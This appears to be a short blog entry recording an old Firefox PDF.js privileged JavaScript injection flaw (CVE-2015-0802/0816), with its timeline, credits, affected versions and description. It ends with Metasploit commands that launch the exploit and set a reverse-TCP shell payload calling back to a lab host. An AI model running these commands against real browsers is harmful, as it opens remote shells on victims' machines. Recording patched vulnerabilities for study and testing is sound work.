Tag Archives: ZDI-15-110

MFSA-2015-42 Firefox PDF.js Privileged Javascript Injection

Timeline :

Vulnerability discovered and reported to the vendor by Bobby Holley
Patch provided by the vendor via MFSA-2015-42 the 2015-03-31
Metasploit PoC provided the 2015-08-16

PoC provided by :

Bobby Holley
Marius Mlynski
joev

Reference(s) :

CVE-2015-0802
MFSA-2015-42
CVE-2015-0816
MFSA-2015-33
ZDI-15-110

Affected version(s) :

Firefox versions bellow version 37

Tested onĀ :

Windows 7 SP1 with Firefox version 36.0.4

Description :

This module gains remote code execution on Firefox 35-36 by abusing a privilege escalation bug in resource:// URIs (CVE-2015-0802). PDF.js (CVE-2015-0816) is used to exploit the bug. This exploit requires the user to click anywhere on the page to trigger the vulnerability.

Commands :

use exploit/multi/browser/firefox_pdfjs_privilege_escalation
set SRVHOST 192.168.6.138
set PAYLOAD firefox/shell_reverse_tcp
set LHOST 192.168.6.138
run

SYSTEMINFO